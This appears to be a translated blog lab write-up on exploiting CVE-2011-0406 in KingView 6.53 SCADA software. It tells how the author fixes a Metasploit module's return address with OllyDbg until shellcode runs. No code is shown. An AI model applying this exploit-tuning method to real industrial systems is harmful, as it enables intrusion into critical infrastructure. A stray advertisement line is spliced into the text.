Opening two virtual machines on a notebook is a bit stuck, and it is too troublesome, so I put the metasploit target machine on another machine, and configured the ip myself.
Target host: 192.168.137.254
Intruder: 192.168.137.253
Vulnerabilities exist on the target machine: KingView 6.53 version CVE-2011-0406 vulnerability, system win2003 SP0
Let's get to the point:
In the information collection, it is known that the target host has opened port 777. Baidu found that this port is running the KingView service, and there are loopholes.
Directly search for the exploit module of this vulnerability in msf. . . No
So, I searched for an exploit on the Internet, put it in /exploits/windows/scada, checked the source code, and found that there is no win2003 SP0 in the target.
No way, first try winXP SP3 to see if it can be used together.
Configuration process:
See if you can bounce the connection:
All right. . . Definitely not. .
Go back to the target host to debug. Through the attack just now, we found that HistorySvr.exe stopped running, indicating that the vulnerability was triggered, but the shellcode was not executed. Then, it should be that the address pointed to by the jump is not the address of the shellcode, and finally called The system default exception handling function.
Open OllyDBG, select "Just-in-time debugging" in the option menu, select "Make ollydbg just-in-time debugger", and then exit. Restart the HistorySvr service and attack again, Ollydbg cuts off the exception handling, and the program terminates at the abnormal instruction.
The reason is that the eax+0x0C address called by call has not been allocated and used, which triggers an exception.
Go back to the source code of this module, find the target, and find that the return address Ret for the target win XP SP3 EN is exactly the value of the EAX register 0x00A1FB84. Obviously, after the overflow occurs, the Ret of the data packet covers EAX, but it does not successfully point to the shellcode. Address, next, you only need to modify the value of Ret.
It is necessary to locate the position of the shellcode. A new target is added to the penetration module, and Ret is written freely. When constructing the overflow data packet of the exploit function, special positioning characters are added, but the total length should be kept unchanged.
CSDN big gift package: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing Close Ollydbg, restart the service, and attack again:
Back on the target machine, ollydbg intercepted the exception again, directly located the character "ABAC" in Memory, searched for the character at 0x00B404C0, and found the shellcode address 0x00B404C4 accordingly
Next, just modify the Ret and exploit functions:
Reload, attack again, success.